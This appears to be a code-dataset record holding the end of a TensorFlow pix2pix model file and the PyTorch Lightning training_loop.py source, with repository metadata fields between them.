d6 = self.g_bn_d6(self.d6)
d6 = tf.concat([d6, e2], 3)
self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6),
[self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True)
d7 = self.g_bn_d7(self.d7)
d7 = tf.concat([d7, e1], 3)
self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7),
[self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True)
return tf.nn.tanh(self.d8)
def save(self, checkpoint_dir, step):
model_name = "pix2pix.model"
model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoint...")
model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
def test(self, args):
init_op = tf.global_variables_initializer()
self.sess.run(init_op)
sample_files = glob('./datasets/{}/val/*.jpg'.format(self.dataset_name))
n = [int(i) for i in map(lambda x: x.split('/')[-1].split('.jpg')[0], sample_files)]
sample_files = [x for (y, x) in sorted(zip(n, sample_files))]
print("Loading testing images ...")
sample = [load_data(sample_file, is_test=True) for sample_file in sample_files]
if (self.is_grayscale):
sample_images = np.array(sample).astype(np.float32)[:, :, :, None]
else:
sample_images = np.array(sample).astype(np.float32)
sample_images = [sample_images[i:i+self.batch_size]
for i in xrange(0, len(sample_images), self.batch_size)]
sample_images = np.array(sample_images)
print(sample_images.shape)
start_time = time.time()
if self.load(self.checkpoint_dir):
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for i, sample_image in enumerate(sample_images):
idx = i+1
print("sampling image ", idx)
samples = self.sess.run(
self.fake_B_sample,
feed_dict={self.real_data: sample_image}
)
save_images(samples, [self.batch_size, 1],
'./{}/test_{:04d}.png'.format(args.test_dir, idx))
| true
| true
|
f705d82868da78fc4b8e5a14a1c63f8b5d2c006e
| 39,980
|
py
|
Python
|
pytorch_lightning/trainer/training_loop.py
|
songwanguw/pytorch-lightning
|
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/trainer/training_loop.py
|
songwanguw/pytorch-lightning
|
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
|
[
"Apache-2.0"
] | 1
|
2020-11-11T11:36:38.000Z
|
2020-11-11T11:36:38.000Z
|
pytorch_lightning/trainer/training_loop.py
|
songwanguw/pytorch-lightning
|
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
from copy import copy, deepcopy
import numpy as np
import torch
import torch.distributed as torch_distrib
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning.core.memory import ModelSummary
from pytorch_lightning.core.step_result import EvalResult, Result
from pytorch_lightning.trainer.states import TrainerState
from pytorch_lightning.trainer.supporters import TensorRunningAccum, Accumulator
from pytorch_lightning.utilities import parsing, AMPType
from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.memory import recursive_detach
from pytorch_lightning.utilities.model_utils import is_overridden
from pytorch_lightning.utilities.parsing import AttributeDict
from pytorch_lightning.utilities.warning_utils import WarningCache
class TrainLoop:
def __init__(self, trainer):
self.trainer = trainer
self.early_stopping_accumulator = None
self.checkpoint_accumulator = None
self.accumulated_loss = None
self.warning_cache = WarningCache()
self._teardown_already_run = False
self.running_loss = TensorRunningAccum(window_length=20)
self.automatic_optimization = True
self._curr_step_result = None
self._cur_grad_norm_dict = None
def on_trainer_init(
self, max_epochs, min_epochs, max_steps, min_steps, num_sanity_val_steps, automatic_optimization
):
self.trainer.global_step = 0
self.trainer.current_epoch = 0
self.trainer.interrupted = False
self.trainer.should_stop = False
self.trainer._state = TrainerState.INITIALIZING
self.trainer.total_batch_idx = 0
self.trainer.batch_idx = 0
self.trainer.num_training_batches = 0
self.trainer.train_dataloader = None
self.automatic_optimization = automatic_optimization
self.trainer.max_epochs = max_epochs
self.trainer.min_epochs = min_epochs
self.trainer.max_steps = max_steps
self.trainer.min_steps = min_steps
if num_sanity_val_steps == -1:
self.trainer.num_sanity_val_steps = float("inf")
else:
self.trainer.num_sanity_val_steps = num_sanity_val_steps
@property
def num_optimizers(self):
num_optimizers = len(self.get_optimizers_iterable())
return num_optimizers
def should_skip_training(self):
if self.trainer.current_epoch >= self.trainer.max_epochs:
return True
if self.trainer.limit_train_batches == 0:
return True
return False
def on_train_start(self):
# clear cache before training
if self.trainer.on_gpu and self.trainer.root_gpu is not None:
# use context because of:
# https://discuss.pytorch.org/t/out-of-memory-when-i-use-torch-cuda-empty-cache/57898
with torch.cuda.device(f"cuda:{self.trainer.root_gpu}"):
torch.cuda.empty_cache()
# hook
self.trainer.call_hook("on_train_start")
def setup_fit(self, model, train_dataloader, val_dataloaders, datamodule):
# bind logger and other properties
self.trainer.model_connector.copy_trainer_model_properties(model)
# clean hparams
if hasattr(model, "hparams"):
parsing.clean_namespace(model.hparams)
# links data to the trainer
self.trainer.data_connector.attach_data(model, train_dataloader, val_dataloaders, datamodule)
# check that model is configured correctly
self.trainer.config_validator.verify_loop_configurations(model)
def setup_training(self, model: LightningModule):
"""Sanity check a few things before starting actual training.
Args:
model: The model to run sanity test on.
"""
# --------------------------
# Setup??
# --------------------------
ref_model = model
if self.trainer.data_parallel:
ref_model = model.module
# set the ranks and devices
self.trainer.accelerator_backend.dist.rank = self.trainer.global_rank
self.trainer.accelerator_backend.dist.device = ref_model.device
# give model convenience properties
ref_model.trainer = self.trainer
# set local properties on the model
self.trainer.model_connector.copy_trainer_model_properties(ref_model)
# init amp. Must be done here instead of __init__ to allow ddp to work
if self.trainer.amp_backend == AMPType.NATIVE and self.trainer.precision == 16 and not self.trainer.use_tpu:
self.trainer.scaler = torch.cuda.amp.GradScaler()
# log hyper-parameters
if self.trainer.logger is not None:
# save exp to get started (this is where the first experiment logs are written)
self.trainer.logger.log_hyperparams(ref_model.hparams_initial)
self.trainer.logger.log_graph(ref_model)
self.trainer.logger.save()
# wait for all to join if on distributed
self.trainer.accelerator_backend.barrier("setup_training")
# register auto-resubmit when on SLURM
self.trainer.slurm_connector.register_slurm_signal_handlers()
# --------------------------
# Pre-train
# --------------------------
# on pretrain routine start
self.trainer.on_pretrain_routine_start(ref_model)
if self.trainer.is_function_implemented("on_pretrain_routine_start"):
ref_model.on_pretrain_routine_start()
# print model summary
if self.trainer.is_global_zero and self.trainer.weights_summary is not None and not self.trainer.testing:
if self.trainer.weights_summary in ModelSummary.MODES:
ref_model.summarize(mode=self.trainer.weights_summary)
else:
raise MisconfigurationException("weights_summary can be None, " + ", ".join(ModelSummary.MODES))
# track model now.
# if cluster resets state, the model will update with the saved weights
self.trainer.model = model
# restore training and model before hpc is called
self.trainer.checkpoint_connector.restore_weights(model)
# on pretrain routine end
self.trainer.on_pretrain_routine_end(ref_model)
if self.trainer.is_function_implemented("on_pretrain_routine_end"):
ref_model.on_pretrain_routine_end()
def on_train_end(self):
if self._teardown_already_run:
return
self._teardown_already_run = True
# trigger checkpoint check. need to temporarily decrease the global step to avoid saving duplicates
# when a checkpoint was saved at the last step
self.trainer.global_step -= 1
self.check_checkpoint_callback(should_save=True, is_last=True)
self.trainer.global_step += 1
# hook
self.trainer.call_hook("on_train_end")
# kill loggers
if self.trainer.logger is not None:
self.trainer.logger.finalize("success")
# summarize profile results
if self.trainer.global_rank == 0:
self.trainer.profiler.describe()
# give accelerators a chance to finish
self.trainer.accelerator_backend.on_train_end()
# clear mem
if self.trainer.on_gpu:
model = self.trainer.get_model()
model.cpu()
torch.cuda.empty_cache()
def check_checkpoint_callback(self, should_save, is_last=False):
# TODO bake this logic into the checkpoint callback
if should_save and self.trainer.checkpoint_connector.has_trained:
checkpoint_callbacks = [c for c in self.trainer.callbacks if isinstance(c, ModelCheckpoint)]
if is_last and any(c.save_last for c in checkpoint_callbacks):
rank_zero_info("Saving latest checkpoint...")
model = self.trainer.get_model()
[c.on_validation_end(self.trainer, model) for c in checkpoint_callbacks]
def on_train_epoch_start(self, epoch):
# update training progress in trainer
self.trainer.current_epoch = epoch
model = self.trainer.get_model()
# reset train dataloader
if self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_train_dataloader(model)
# set seed for distributed sampler (enables shuffling for each epoch)
try:
self.trainer.train_dataloader.sampler.set_epoch(epoch)
except Exception:
pass
# changing gradient according accumulation_scheduler
self.trainer.accumulation_scheduler.on_epoch_start(self.trainer, self.trainer.get_model())
# stores accumulated grad fractions per batch
self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches)
# structured result accumulators for callbacks
self.early_stopping_accumulator = Accumulator()
self.checkpoint_accumulator = Accumulator()
# hook
self.trainer.call_hook("on_epoch_start")
self.trainer.call_hook("on_train_epoch_start")
def on_train_batch_end(self, epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx):
# hook
self.trainer.call_hook('on_batch_end')
self.trainer.call_hook('on_train_batch_end', epoch_end_outputs, batch, batch_idx, dataloader_idx)
# figure out what to track for epoch end
self.track_epoch_end_reduce_metrics(epoch_output, epoch_end_outputs)
# reset batch logger internals
self.trainer.logger_connector.on_train_batch_end()
def reset_train_val_dataloaders(self, model):
if not self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_train_dataloader(model)
if self.trainer.val_dataloaders is None and not self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_val_dataloader(model)
def track_epoch_end_reduce_metrics(self, epoch_output, epoch_end_outputs):
# track the outputs to reduce at the end of the epoch
for opt_idx, opt_outputs in enumerate(epoch_end_outputs):
# with 1 step (no tbptt) don't use a sequence at epoch end
if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result):
opt_outputs = opt_outputs[0]
epoch_output[opt_idx].append(opt_outputs)
def get_optimizers_iterable(self):
"""
Generates an iterable with (idx, optimizer) for each optimizer.
"""
if not self.trainer.optimizer_frequencies:
# call training_step once per optimizer
return list(enumerate(self.trainer.optimizers))
optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies)
optimizers_loop_length = optimizer_freq_cumsum[-1]
current_place_in_loop = self.trainer.total_batch_idx % optimizers_loop_length
# find optimzier index by looking for the first {item > current_place} in the cumsum list
opt_idx = np.argmax(optimizer_freq_cumsum > current_place_in_loop)
return [[opt_idx, self.trainer.optimizers[opt_idx]]]
def on_after_backward(self, training_step_output, batch_idx, untouched_loss):
is_result_obj = isinstance(training_step_output, Result)
if is_result_obj:
training_step_output.detach()
else:
training_step_output.batch_loss = training_step_output.batch_loss.detach()
# insert after step hook
self.trainer.call_hook("on_after_backward")
# when in dev debugging track the losses
self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach())
def _check_training_step_output(self, training_step_output):
if isinstance(training_step_output, torch.Tensor) and not self.automatic_optimization:
if training_step_output.grad_fn is None:
# TODO: Find why - RuntimeError: Expected to mark a variable ready only once ...
raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor")
def training_step(self, split_batch, batch_idx, opt_idx, hiddens):
# give the PL module a result for logging
model_ref = self.trainer.get_model()
with self.trainer.profiler.profile("model_forward"):
args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens)
# manually capture logged metrics
model_ref._current_fx_name = 'training_step'
training_step_output = self.trainer.accelerator_backend.training_step(args)
self.trainer.logger_connector.cache_logged_metrics()
self._check_training_step_output(training_step_output)
training_step_output = self.trainer.call_hook("training_step_end", training_step_output)
training_step_output_for_epoch_end, training_step_output = self._process_training_step_output(
training_step_output, split_batch
)
is_result_obj = isinstance(training_step_output, Result)
if training_step_output_for_epoch_end is None:
return None
# enable empty loss when using manual opt
closure_loss = None
untouched_loss = None
if self.trainer.train_loop.automatic_optimization:
# accumulate loss
# (if accumulate_grad_batches = 1 no effect)
if is_result_obj:
closure_loss = training_step_output.minimize
else:
closure_loss = training_step_output.batch_loss
closure_loss = closure_loss / self.trainer.accumulate_grad_batches
# the loss will get scaled for amp. avoid any modifications to it
untouched_loss = closure_loss.detach().clone()
# result
result = AttributeDict(
closure_loss=closure_loss,
loss=untouched_loss,
training_step_output=training_step_output,
training_step_output_for_epoch_end=training_step_output_for_epoch_end,
hiddens=training_step_output.hiddens,
)
return result
def _process_training_step_output(self, training_step_output, split_batch):
training_step_output_for_epoch_end = training_step_output
# enable validation_step return None
if training_step_output_for_epoch_end is None:
return None, None
# -----------------------------------------
# process result return (DEPRECATE in 1.0)
# -----------------------------------------
if isinstance(training_step_output, Result):
training_step_output_for_epoch_end = self._process_result(training_step_output, split_batch)
return training_step_output_for_epoch_end, training_step_output
# -----------------------------------------
# process hybrid (1.0)
# -----------------------------------------
# no need for these checks in 1.0.0
# TODO: remove checks in 1.0.0
is_tensor = isinstance(training_step_output_for_epoch_end, torch.Tensor)
is_1_0_output = is_tensor or ("log" not in training_step_output and "progress_bar" not in training_step_output)
if is_1_0_output:
return self._process_training_step_output_1_0(training_step_output, split_batch)
# -----------------------------------------
# process old dict (deprecate 1.0)
# -----------------------------------------
training_step_output = self.trainer.process_dict_result(training_step_output, train=True)
training_step_output = AttributeDict(
batch_loss=training_step_output[0],
pbar_on_batch_end=training_step_output[1],
log_metrics=training_step_output[2],
callback_metrics=training_step_output[3],
hiddens=training_step_output[4],
)
# if the user decides to finally reduce things in epoch_end, save raw output without graphs
if isinstance(training_step_output_for_epoch_end, torch.Tensor):
training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach()
else:
training_step_output_for_epoch_end = recursive_detach(training_step_output_for_epoch_end)
return training_step_output_for_epoch_end, training_step_output
def _process_training_step_output_1_0(self, training_step_output, split_batch):
result = self.trainer.get_model()._results
loss = None
hiddens = None
# handle dict return
if isinstance(training_step_output, dict):
loss = training_step_output.pop("loss", None)
hiddens = training_step_output.pop("hiddens", None)
result["extra"] = training_step_output
# handle scalar return
elif isinstance(training_step_output, torch.Tensor):
loss = training_step_output
result["extra"] = {}
# map to results under the hood
result.minimize = loss
result.hiddens = hiddens
# track batch for manual reduction with result
result.track_batch_size(len(split_batch))
# track metrics without grads for epoch reduction
training_step_output_for_epoch_end = copy(result)
training_step_output_for_epoch_end.detach()
if self.trainer.move_metrics_to_cpu:
training_step_output_for_epoch_end.cpu()
# what flows back into the system
training_step_output = result
return training_step_output_for_epoch_end, training_step_output
def _process_result(self, training_step_output, split_batch):
training_step_output.track_batch_size(len(split_batch))
m = """
TrainResult and EvalResult were deprecated in 0.9.1 and support will drop in 1.0.0.
Use self.log and .write from the LightningModule to log metrics and write predictions.
training_step can now only return a scalar (for the loss) or a dictionary with anything you want.
Option 1:
return loss
Option 2:
return {'loss': loss, 'anything_else': ...}
Option 3:
return {'loss': loss, 'hiddens': hiddens, 'anything_else': ...}
"""
rank_zero_warn(m)
# don't allow EvalResult in the training_step
if isinstance(training_step_output, EvalResult):
raise MisconfigurationException(
"training_step cannot return EvalResult, " "use a dict or TrainResult instead"
)
training_step_output_for_epoch_end = copy(training_step_output)
training_step_output_for_epoch_end.detach()
return training_step_output_for_epoch_end
def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure):
with self.trainer.profiler.profile("optimizer_step"):
# optimizer step lightningModule hook
self.trainer.accelerator_backend.optimizer_step(
optimizer, batch_idx, opt_idx, train_step_and_backward_closure
)
def on_before_zero_grad(self, optimizer):
self.trainer.call_hook('on_before_zero_grad', optimizer)
def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx):
self.trainer.accelerator_backend.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
def track_and_norm_grad(self, optimizer):
# track gradient norms
grad_norm_dic = self._track_gradient_norm()
# clip gradients
self.trainer.accelerator_backend.clip_gradients(optimizer)
self._cur_grad_norm_dict = grad_norm_dic
def _track_gradient_norm(self):
grad_norm_dict = {}
if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0:
if float(self.trainer.track_grad_norm) > 0:
model = self.trainer.get_model()
grad_norm_dict = model.grad_norm(self.trainer.track_grad_norm)
return grad_norm_dict
def process_hiddens(self, opt_closure_result):
hiddens = opt_closure_result.hiddens
if isinstance(opt_closure_result.training_step_output, Result):
opt_closure_result.training_step_output_for_epoch_end.drop_hiddens()
return hiddens
def tbptt_split_batch(self, batch):
splits = [batch]
if self.trainer.truncated_bptt_steps is not None:
model_ref = self.trainer.get_model()
with self.trainer.profiler.profile("tbptt_split_batch"):
splits = model_ref.tbptt_split_batch(batch, self.trainer.truncated_bptt_steps)
return splits
def run_training_epoch(self):
# get model
model = self.trainer.get_model()
# modify dataloader if needed (ddp, etc...)
train_dataloader = self.trainer.accelerator_backend.process_dataloader(self.trainer.train_dataloader)
# track epoch output
epoch_output = [[] for _ in range(self.num_optimizers)]
# enable profiling for the dataloader
train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader)
dataloader_idx = 0
should_check_val = False
for batch_idx, (batch, is_last_batch) in train_dataloader:
self.trainer.batch_idx = batch_idx
# ------------------------------------
# TRAINING_STEP + TRAINING_STEP_END
# ------------------------------------
batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx)
# when returning -1 from train_step, we end epoch early
if batch_output.signal == -1:
break
# only track outputs when user implements training_epoch_end
# otherwise we will build up unnecessary memory
epoch_end_outputs = self.process_train_step_outputs(
batch_output.training_step_output_for_epoch_end,
self.early_stopping_accumulator,
self.checkpoint_accumulator,
)
# hook
# TODO: add outputs to batches
self.on_train_batch_end(epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx)
# -----------------------------------------
# SAVE METRICS TO LOGGERS
# -----------------------------------------
self.trainer.logger_connector.log_train_step_metrics(batch_output)
# -----------------------------------------
# VALIDATE IF NEEDED + CHECKPOINT CALLBACK
# -----------------------------------------
should_check_val = self.should_check_val_fx(batch_idx, is_last_batch)
if should_check_val:
self.trainer.run_evaluation(test_mode=False)
# reset stage to train
self.trainer.logger_connector.set_stage("train")
# -----------------------------------------
# SAVE LOGGERS (ie: Tensorboard, etc...)
# -----------------------------------------
self.save_loggers_on_train_batch_end()
# update LR schedulers
monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics)
self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics)
self.trainer.checkpoint_connector.has_trained = True
# max steps reached, end training
if self.trainer.max_steps is not None and self.trainer.max_steps == self.trainer.global_step + 1:
accumulation_done = self._accumulated_batches_reached()
# Ensure accumulation across batches has completed before breaking loop
if accumulation_done:
break
# end epoch early
# stop when the flag is changed or we've gone past the amount
# requested in the batches
if self.trainer.should_stop:
break
self.trainer.total_batch_idx += 1
# stop epoch if we limited the number of training batches
if (batch_idx + 1) >= self.trainer.num_training_batches:
break
# progress global step according to grads progress
self.increment_accumulated_grad_global_step()
# epoch end hook
self.run_on_epoch_end_hook(epoch_output)
# log epoch metrics
self.trainer.logger_connector.log_train_epoch_end_metrics(
epoch_output,
self.checkpoint_accumulator,
self.early_stopping_accumulator,
self.num_optimizers
)
# when no val loop is present or fast-dev-run still need to call checkpoints
self.check_checkpoint_callback(not (should_check_val or is_overridden('validation_step', model)))
# increment the global step once
# progress global step according to grads progress
self.increment_accumulated_grad_global_step()
def run_training_batch(self, batch, batch_idx, dataloader_idx):
# track grad norms
grad_norm_dic = {}
# bookkeeping
using_results_obj = False
self.trainer.hiddens = None
# track all outputs across time and num of optimizers
batch_outputs = [[] for _ in range(len(self.get_optimizers_iterable()))]
if batch is None:
return AttributeDict(signal=0, grad_norm_dic=grad_norm_dic)
# hook
response = self.trainer.call_hook("on_batch_start")
if response == -1:
return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
# hook
response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx)
if response == -1:
return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
# lightning module hook
splits = self.tbptt_split_batch(batch)
for split_idx, split_batch in enumerate(splits):
# create an iterable for optimizers and loop over them
for opt_idx, optimizer in self.prepare_optimizers():
# toggle model params + set info to logger_connector
self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer)
if self.should_accumulate():
# For gradient accumulation
# -------------------
# calculate loss (train step + train step end)
# -------------------
# perform dpp sync only when performing optimizer_step
with self.block_ddp_sync_behaviour():
self.training_step_and_backward(split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens)
batch_outputs = self._process_closure_result(
batch_outputs=batch_outputs,
opt_idx=opt_idx,
)
# ------------------------------
# BACKWARD PASS
# ------------------------------
# gradient update with accumulated gradients
else:
if self.automatic_optimization:
def train_step_and_backward_closure():
result = self.training_step_and_backward(
split_batch,
batch_idx,
opt_idx,
optimizer,
self.trainer.hiddens
)
return None if result is None else result.loss
# optimizer step
self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure)
else:
self._curr_step_result = self.training_step(
split_batch,
batch_idx,
opt_idx,
self.trainer.hiddens
)
if self._curr_step_result is None:
# user decided to skip optimization
# make sure to zero grad.
self.zero_grad_handler(batch_idx, optimizer, opt_idx)
continue
batch_outputs = self._process_closure_result(
batch_outputs=batch_outputs,
opt_idx=opt_idx,
)
# todo: Properly aggregate grad_norm accros opt_idx and split_idx
grad_norm_dic = self._cur_grad_norm_dict
self._cur_grad_norm_dict = None
# hook + clear gradients
self.zero_grad_handler(batch_idx, optimizer, opt_idx)
# update running loss + reset accumulated loss
self.update_running_loss()
result = AttributeDict(
signal=0,
grad_norm_dic=grad_norm_dic,
training_step_output_for_epoch_end=batch_outputs,
)
return result
@contextmanager
def block_ddp_sync_behaviour(self):
if isinstance(self.trainer.model, torch.nn.parallel.DistributedDataParallel):
yield self.trainer.model.no_sync()
else:
yield
def _process_closure_result(
self, batch_outputs: list, opt_idx: int
) -> list:
opt_closure_result = self._curr_step_result
if opt_closure_result is not None:
# cache metrics
self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result)
# track hiddens
self.trainer.hiddens = self.process_hiddens(opt_closure_result)
# check if loss or model weights are nan
if self.trainer.terminate_on_nan:
self.trainer.detect_nan_tensors(opt_closure_result.loss)
# track all the outputs across all steps
batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0
batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end)
if self.automatic_optimization:
# track total loss for logging (avoid mem leaks)
self.accumulated_loss.append(opt_closure_result.loss)
self._curr_step_result = None
return batch_outputs
def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens):
"""
wrap the forward step in a closure so second order methods work
"""
# lightning module hook
result = self.training_step(split_batch, batch_idx, opt_idx, hiddens)
self._curr_step_result = result
if result is None:
self.warning_cache.warn("training_step returned None if it was on purpose, ignore this warning...")
return None
if self.trainer.train_loop.automatic_optimization:
# backward pass
with self.trainer.profiler.profile("model_backward"):
self.backward(result, optimizer, opt_idx)
# hook - call this hook only
# when gradients have finished to accumulate
if not self.should_accumulate():
self.on_after_backward(result.training_step_output, batch_idx, result.loss)
# check if loss or model weights are nan
if self.trainer.terminate_on_nan:
self.trainer.detect_nan_tensors(result.loss)
return result
def backward(self, result, optimizer, opt_idx, *args, **kwargs):
self.trainer.dev_debugger.track_event("backward_call")
# backward can be called manually in the training loop
if isinstance(result, torch.Tensor):
self.trainer.accelerator_backend.backward(result, optimizer, opt_idx, *args, **kwargs)
else:
result.closure_loss = self.trainer.accelerator_backend.backward(
result.closure_loss, optimizer, opt_idx, *args, **kwargs
)
if not self.should_accumulate():
# track gradients
self.track_and_norm_grad(optimizer=optimizer)
def update_train_loop_lr_schedulers(self, monitor_metrics=None):
num_accumulated_batches_reached = self._accumulated_batches_reached()
num_training_batches_reached = self._num_training_batches_reached()
if num_accumulated_batches_reached or num_training_batches_reached:
# update lr
self.trainer.optimizer_connector.update_learning_rates(interval="step", monitor_metrics=monitor_metrics)
def run_on_epoch_end_hook(self, epoch_output):
self.trainer.call_hook('on_epoch_end')
self.trainer.call_hook('on_train_epoch_end', epoch_output)
self.trainer.logger_connector.on_train_epoch_end()
def increment_accumulated_grad_global_step(self):
num_accumulated_batches_reached = self._accumulated_batches_reached()
num_training_batches_reached = self._num_training_batches_reached()
# progress global step according to grads progress
if num_accumulated_batches_reached or num_training_batches_reached:
self.trainer.global_step += 1
def _accumulated_batches_reached(self):
return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0
def _num_training_batches_reached(self):
return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches
def should_accumulate(self):
# checks if backward or backward + optimizer step (via closure)
accumulation_done = self._accumulated_batches_reached()
is_final_batch = self._num_training_batches_reached()
return not (accumulation_done or is_final_batch)
def should_check_val_fx(self, batch_idx, is_last_batch):
# decide if we should run validation
is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0
is_val_check_epoch = (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch == 0
can_check_val = self.trainer.enable_validation and is_val_check_epoch
should_check_val = is_val_check_batch or self.trainer.should_stop
is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf")
should_check_val = can_check_val and (should_check_val or is_last_batch_for_infinite_dataset)
return should_check_val
def build_train_args(self, batch, batch_idx, opt_idx, hiddens):
# enable not needing to add opt_idx to training_step
args = [batch, batch_idx]
if len(self.trainer.optimizers) > 1:
if self.trainer.has_arg("training_step", "optimizer_idx"):
args.append(opt_idx)
else:
num_opts = len(self.trainer.optimizers)
raise ValueError(
f"Your LightningModule defines {num_opts} optimizers but "
f'training_step is missing the "optimizer_idx" argument.'
)
# pass hiddens if using tbptt
if self.trainer.truncated_bptt_steps is not None:
args.append(hiddens)
return args
def save_loggers_on_train_batch_end(self):
# when loggers should save to disk
should_flush_logs = self.trainer.logger_connector.should_flush_logs
if should_flush_logs or self.trainer.fast_dev_run:
if self.trainer.is_global_zero and self.trainer.logger is not None:
self.trainer.logger.save()
def process_train_step_outputs(self, all_train_step_outputs, early_stopping_accumulator, checkpoint_accumulator):
"""
Figure out what needs to be tracked/logged at the end of the epoch
"""
# the training step outputs a list per optimizer. The list contains the outputs at each time step
# when no TBPTT is used, then the list has 1 item per batch
# when TBPTT IS used, then the list has n items (1 per time step)
epoch_end_outputs = []
for optimizer_idx_outputs in all_train_step_outputs:
# extract one representative sample from each time step (1 if no tbptt) and 0th optimizer
if len(optimizer_idx_outputs) == 0:
continue
sample_output = optimizer_idx_outputs[-1]
# pull out callback info if available (ie: Results object)
if isinstance(sample_output, dict) and "early_stop_on" in sample_output:
early_stopping_accumulator.accumulate(sample_output["early_stop_on"])
if isinstance(sample_output, dict) and "checkpoint_on" in sample_output:
checkpoint_accumulator.accumulate(sample_output["checkpoint_on"])
# decide if we need to reduce at the end of the epoch automatically
auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end
# only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end
if is_overridden("training_epoch_end", model=self.trainer.get_model()) or auto_reduce_tng_result:
epoch_end_outputs.append(optimizer_idx_outputs)
return epoch_end_outputs
def prepare_optimizers(self):
# in manual optimization we loop over all optimizers at once
optimizers = self.get_optimizers_iterable()
if not self.automatic_optimization:
optimizers = [optimizers[0]]
return optimizers
def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer):
# set split_idx to trainer for tracking
self.trainer.split_idx = split_idx
# make sure only the gradients of the current optimizer's parameters are calculated
# in the training step to prevent dangling gradients in multiple-optimizer setup.
if self.automatic_optimization and len(self.trainer.optimizers) > 1:
model = self.trainer.get_model()
model.toggle_optimizer(optimizer, opt_idx)
# use to track metrics internally
self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch)
def update_running_loss(self):
accumulated_loss = self.accumulated_loss.mean()
if accumulated_loss is not None:
# calculate running loss for display
self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches)
# reset for next set of accumulated grads
self.accumulated_loss.reset()
def zero_grad_handler(self, batch_idx, optimizer, opt_idx):
if self.automatic_optimization:
# hook
self.on_before_zero_grad(optimizer)
optimizers = enumerate([optimizer])
else:
optimizers = self.get_optimizers_iterable()
for idx, optimizer in optimizers:
self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
| 41.995798
| 121
| 0.654402
|
from contextlib import contextmanager
from copy import copy, deepcopy
import numpy as np
import torch
import torch.distributed as torch_distrib
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning.core.memory import ModelSummary
from pytorch_lightning.core.step_result import EvalResult, Result
from pytorch_lightning.trainer.states import TrainerState
from pytorch_lightning.trainer.supporters import TensorRunningAccum, Accumulator
from pytorch_lightning.utilities import parsing, AMPType
from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn
